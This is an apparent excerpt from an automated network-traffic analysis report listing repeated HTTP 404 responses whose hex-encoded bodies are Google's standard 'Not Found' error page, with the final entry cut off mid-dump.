                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:42 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:43 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:44 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:46 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:47 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:48 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:49 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 